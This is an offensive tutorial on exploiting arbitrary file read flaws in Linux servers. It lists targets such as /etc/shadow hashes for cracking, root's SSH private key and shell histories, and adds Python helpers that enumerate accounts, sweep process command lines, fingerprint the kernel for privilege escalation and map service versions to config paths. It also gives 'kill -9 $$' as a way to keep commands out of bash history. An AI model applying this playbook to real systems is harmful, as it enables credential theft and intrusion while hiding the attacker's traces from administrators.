Exploiting arbitrary file read vulnerabilities

Approaches to exploiting an arbitrary file read

Some of these files need elevated privileges to read (/etc/shadow and anything under /root are root-only), so what comes back depends on the user the vulnerable service runs as.

  1. /etc/passwd # user accounts: names, UIDs, home directories, login shells
  2. /etc/shadow # password hashes, straight into John the Ripper
  3. /etc/hosts # host information
  4. /root/.bashrc # environment variables
  5. /root/.bash_history # also check the histories of users other than root
  6. /root/.viminfo # vim state: recently edited files, search and command history
  7. /root/.ssh/id_rsa # take the private key and SSH in directly
  8. /proc/xxxx/cmdline # process enumeration; xxxx is the PID, iterate 0000-9999 with Burp Suite (/proc/self/cmdline is the vulnerable process itself)
  9. database config files
  10. web logs: access.log, error.log
  11. ssh logs
  12. /var/lib/php/sess_PHPSESSID # non-routine: PHP session files (see the Ping An Technology session-include challenge at http://www.jianshu.com/p/2c24ea34566b)
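As an added example (not part of the original write-up), the Python below works through the list above: it parses /etc/passwd for accounts that can actually log in, derives the per-user files worth requesting next, sweeps /proc/<pid>/cmdline the way the Burp loop does, and pulls configuration file paths out of process arguments. The FAKE_FS dictionary and the read_file() stub are constructed stand-ins for the vulnerable endpoint; in a real engagement read_file would issue the vulnerable request and return the response body.

```python
import re
from typing import Callable, Dict, List, Optional

# Constructed stand-in for the target: path -> file contents. A real read_file()
# would send the vulnerable request (e.g. ?file=/etc/passwd) and return the
# body, or None when the server returns nothing for that path.
FAKE_FS: Dict[str, bytes] = {
    "/etc/passwd": (
        b"root:x:0:0:root:/root:/bin/bash\n"
        b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        b"deploy:x:1000:1000::/home/deploy:/bin/bash\n"
        b"backup:x:1001:1001::/home/backup:/bin/false\n"
    ),
    "/proc/1/cmdline": b"/sbin/init\x00",
    # nginx rewrites its argv, so the whole command line is one NUL-terminated string
    "/proc/812/cmdline": (
        b"nginx: master process /usr/local/services/nginx-1.6.2/sbin/nginx"
        b" -c /usr/local/services/nginx-1.6.2/conf/nginx.conf\x00"
    ),
    "/proc/1337/cmdline": b"/usr/bin/mysqld\x00--defaults-file=/etc/mysql/my.cnf\x00",
    "/proc/2048/cmdline": b"php-fpm: pool www\x00",
}

ReadFn = Callable[[str], Optional[bytes]]


def read_file(path: str) -> Optional[bytes]:
    """Stand-in for the arbitrary file read primitive (hypothetical)."""
    return FAKE_FS.get(path)


def login_users(read: ReadFn) -> List[dict]:
    """Parse /etc/passwd and keep the accounts that can actually log in."""
    raw = read("/etc/passwd")
    if raw is None:
        return []
    users = []
    for line in raw.decode(errors="replace").splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, _, _, home, shell = fields
        if shell.endswith(("nologin", "/false")):
            continue  # service accounts: no history, no keys worth reading
        users.append({"name": name, "uid": int(uid), "home": home, "shell": shell})
    return users


def home_targets(users: List[dict]) -> List[str]:
    """Per-user files from the list above, resolved against each home directory."""
    names = [".bash_history", ".bashrc", ".viminfo", ".ssh/id_rsa", ".ssh/authorized_keys"]
    return [f"{u['home'].rstrip('/')}/{n}" for u in users for n in names]


def sweep_cmdlines(read: ReadFn, pids=range(1, 10000)) -> Dict[int, List[str]]:
    """Read /proc/<pid>/cmdline for each candidate PID; argv is NUL-separated."""
    found = {}
    for pid in pids:
        raw = read(f"/proc/{pid}/cmdline")
        if not raw:
            continue
        found[pid] = [a for a in raw.decode(errors="replace").split("\x00") if a]
    return found


# An absolute path ending in a config-like extension, not glued to a preceding path character
CONFIG_PATH_RE = re.compile(r"(?<![\w/.-])(/[\w./-]+\.(?:conf|cnf|xml|ini|properties|ya?ml|json))")


def config_paths_from_cmdlines(cmdlines: Dict[int, List[str]]) -> List[str]:
    """Pull config file paths out of process arguments (-c /path, --defaults-file=/path ...)."""
    paths = set()
    for argv in cmdlines.values():
        for arg in argv:
            paths.update(CONFIG_PATH_RE.findall(arg))
    return sorted(paths)


if __name__ == "__main__":
    users = login_users(read_file)
    print("users:", [u["name"] for u in users])
    print("home files:", home_targets(users))
    cmds = sweep_cmdlines(read_file)
    print("config paths:", config_paths_from_cmdlines(cmds))
```

The sweep is what the 0000-9999 Burp loop does by hand; the config path extraction is the step that turns item 8 into item 9, since a database or web server usually names its configuration file on its command line.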

Inferring the system version

With only a file read primitive you cannot run uname or lsb_release, so read the files these commands draw on instead: /proc/version carries the same kernel version string that uname -a prints, and /etc/lsb-release (where present) or /etc/os-release holds the distribution release that lsb_release -d reports. The distribution-specific release files below exist only on their own distribution, so a hit on one of them already tells you the family.

uname -a
lsb_release -d
cat /etc/issue
cat /proc/version
cat /etc/redhat-release
cat /etc/debian_version
cat /etc/slackware_version
ls /etc/*version
cat /proc/cpuinfo
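Added example (not from the original page): a fingerprinter that reads those files through the same kind of primitive and normalises what they say, taking the kernel release and a distribution hint from /proc/version, the release from /etc/os-release, and falling back to the distribution-specific one-liners on older systems that lack it. The SAMPLE_FILES contents are constructed for the illustration.

```python
import re
from typing import Callable, Dict, Optional

# Constructed sample contents; a real run would fetch each path through the
# file read primitive instead of this dictionary.
SAMPLE_FILES: Dict[str, bytes] = {
    "/proc/version": (
        b"Linux version 4.15.0-112-generic (buildd@lcy01-amd64-027) "
        b"(gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) "
        b"#113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020\n"
    ),
    "/etc/os-release": (
        b'NAME="Ubuntu"\nVERSION="18.04.5 LTS (Bionic Beaver)"\nID=ubuntu\n'
        b'ID_LIKE=debian\nPRETTY_NAME="Ubuntu 18.04.5 LTS"\nVERSION_ID="18.04"\n'
    ),
    "/etc/debian_version": b"buster/sid\n",
    "/etc/issue": b"Ubuntu 18.04.5 LTS \\n \\l\n\n",
}

ReadFn = Callable[[str], Optional[bytes]]

# "Linux version <release> (<builder>) (<compiler>) #<build> ..."
KERNEL_RE = re.compile(
    r"^Linux version (?P<release>\S+) \((?P<builder>[^)]*)\) "
    r"\((?P<compiler>.*)\) (?P<build>#\d+.*)$"
)
DISTRO_IN_COMPILER_RE = re.compile(r"\((Ubuntu|Debian|Red Hat|SUSE|Alpine|Gentoo)[^)]*\)")


def parse_proc_version(text: str) -> Optional[dict]:
    """Split /proc/version into its parts; the compiler string usually names the distro."""
    m = KERNEL_RE.match(text.strip())
    if not m:
        return None
    info = m.groupdict()
    hint = DISTRO_IN_COMPILER_RE.search(info["compiler"])
    info["distro_hint"] = hint.group(1) if hint else None
    return info


def parse_os_release(text: str) -> Dict[str, str]:
    """KEY=value lines, values optionally quoted."""
    kv = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        kv[key] = value.strip().strip('"').strip("'")
    return kv


def fingerprint(read: ReadFn) -> dict:
    """Combine the readable release files into one kernel/distro summary."""
    result = {"kernel": None, "distro": None, "distro_version": None, "sources": []}
    raw = read("/proc/version")
    if raw:
        kernel = parse_proc_version(raw.decode(errors="replace"))
        if kernel:
            result["kernel"] = kernel["release"]
            result["distro"] = kernel["distro_hint"]
            result["sources"].append("/proc/version")
    raw = read("/etc/os-release")
    if raw:
        osr = parse_os_release(raw.decode(errors="replace"))
        result["distro"] = osr.get("NAME", result["distro"])
        result["distro_version"] = osr.get("VERSION_ID")
        result["sources"].append("/etc/os-release")
    else:
        # Older systems: the distribution-specific one-line release files
        for path in ("/etc/redhat-release", "/etc/debian_version",
                     "/etc/slackware_version", "/etc/issue"):
            raw = read(path)
            if raw:
                result["distro_version"] = raw.decode(errors="replace").splitlines()[0].strip()
                result["sources"].append(path)
                break
    return result


if __name__ == "__main__":
    print(fingerprint(SAMPLE_FILES.get))
```

Usage: pass any callable that maps a path to bytes (or None), such as SAMPLE_FILES.get here or a wrapper around the vulnerable request in practice. The kernel release is the value to check against local privilege escalation candidates later; the distro and version decide which default paths to try in the next section.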

Reverse shell without leaving traces

bash keeps the commands of the current session in memory and only writes them to ~/.bash_history when the shell exits normally. Sending SIGKILL to the current shell ($$ is its PID) ends the session before that write can happen:

kill -9 $$

This only stops the current session's history from being saved; entries already in the file, and the web server and SSH logs listed above, are untouched.

Common default paths

Spin up a VM of the same distribution and check what the default paths actually are. Note that the /usr/local/services/<product>-<version>/ entries below come from one particular deployment rather than package defaults: the directory name carries the product version, and some file names (haolaiyao.conf) are specific to that site.

ssh

/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/etc/ssh/sshd_config
/var/log/secure # SSH auth log on RHEL/CentOS; Debian/Ubuntu write it to /var/log/auth.log

Nginx

/etc/nginx/nginx.conf
/var/www/html
/usr/local/services/nginx-1.6.2/logs/access.log
/usr/local/services/nginx-1.6.2/logs/error.log
/usr/local/services/nginx-1.6.2/nginx.conf
/usr/local/services/nginx-1.6.2/conf/nginx.conf
/usr/local/services/nginx-1.6.2/conf/proxy.conf
/usr/local/services/nginx-1.6.2/conf/extra/haolaiyao.conf

Apache

/home/httpd/
/home/httpd/www/

jetty

/usr/local/services/jetty-8.1.16/
/usr/local/services/jetty-8.1.16/logs/stderrout.log
/usr/local/services/jetty-8.1.16/etc/jetty.xml

resin

/usr/local/services/resin-4.0.44/
/usr/local/services/resin-4.0.44/conf/resin.xml
/usr/local/services/resin-4.0.44/conf/resin.properties

tomcat

/usr/local/services/apache-tomcat-8.0.23/logs
/usr/local/services/apache-tomcat-8.0.23/logs/catalina.out

svn

/home/svnroot/
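Added example (not from the original page) that ties the version exposed in a service banner to the versioned directories listed above, probes the resulting paths through the read primitive, and follows nginx include directives so that vhost files such as extra/haolaiyao.conf can be located from the main nginx.conf. The banner regexes, the FAKE_FS contents and the read() stub are assumptions made for the illustration; the path templates are taken from the lists above.

```python
import posixpath
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed stand-in for the target file system; a real read() would issue
# the vulnerable request and return the body, or None when nothing comes back.
FAKE_FS: Dict[str, bytes] = {
    "/usr/local/services/nginx-1.6.2/conf/nginx.conf": (
        b"worker_processes 4;\n"
        b"http {\n"
        b"    include mime.types;\n"
        b"    include extra/haolaiyao.conf;\n"
        b"    include /etc/nginx/conf.d/upstreams.conf;\n"
        b"}\n"
    ),
    "/usr/local/services/nginx-1.6.2/logs/error.log": (
        b"2020/07/09 23:41:39 [notice] 812#0: start worker processes\n"
    ),
}

# Layouts from the lists above: stock package paths plus the
# /usr/local/services/<product>-<version>/ convention of one deployment.
# {v} is filled in with the version learned from the service banner.
PATH_TEMPLATES: Dict[str, List[str]] = {
    "nginx": [
        "/etc/nginx/nginx.conf",
        "/usr/local/services/nginx-{v}/conf/nginx.conf",
        "/usr/local/services/nginx-{v}/logs/access.log",
        "/usr/local/services/nginx-{v}/logs/error.log",
    ],
    "tomcat": ["/usr/local/services/apache-tomcat-{v}/logs/catalina.out"],
    "jetty": [
        "/usr/local/services/jetty-{v}/etc/jetty.xml",
        "/usr/local/services/jetty-{v}/logs/stderrout.log",
    ],
    "resin": [
        "/usr/local/services/resin-{v}/conf/resin.xml",
        "/usr/local/services/resin-{v}/conf/resin.properties",
    ],
}

# Banner patterns (assumed for this example): nginx in the Server header,
# Tomcat/Jetty/Resin in their default error pages or Server headers.
BANNER_RES = {
    "nginx": re.compile(r"nginx/(\d+\.\d+\.\d+)"),
    "tomcat": re.compile(r"Apache Tomcat/(\d+\.\d+\.\d+)"),
    "jetty": re.compile(r"Jetty\((\d+\.\d+\.\d+)"),
    "resin": re.compile(r"Resin/(\d+\.\d+\.\d+)"),
}


def identify(banner: str) -> Optional[Tuple[str, str]]:
    """Return (product, version) from a banner string, or None if unrecognised."""
    for product, rx in BANNER_RES.items():
        m = rx.search(banner)
        if m:
            return product, m.group(1)
    return None


def candidate_paths(product: str, version: str) -> List[str]:
    """Fill the version into every template known for the product."""
    return [t.format(v=version) for t in PATH_TEMPLATES.get(product, [])]


def probe(read: Callable[[str], Optional[bytes]], paths: List[str]) -> List[str]:
    """Try each path through the read primitive; keep the ones that come back."""
    return [p for p in paths if read(p) is not None]


INCLUDE_RE = re.compile(r"^\s*include\s+([^;\s]+)\s*;", re.M)


def nginx_includes(conf_path: str, conf_text: str) -> List[str]:
    """Follow include directives. nginx resolves relative include paths against
    the directory of the main nginx.conf (its conf prefix). Glob patterns are
    returned as written, since a file read primitive cannot expand them."""
    base = posixpath.dirname(conf_path)
    return [inc if inc.startswith("/") else posixpath.join(base, inc)
            for inc in INCLUDE_RE.findall(conf_text)]


if __name__ == "__main__":
    hit = identify("Server: nginx/1.6.2")
    if hit:
        found = probe(FAKE_FS.get, candidate_paths(*hit))
        print("readable:", found)
        for conf in found:
            if conf.endswith("nginx.conf"):
                print("includes:", nginx_includes(conf, FAKE_FS[conf].decode()))
```

Once the main configuration is readable, the include list is the shortest route to the vhost definitions, which in turn name the document roots and log files worth reading next.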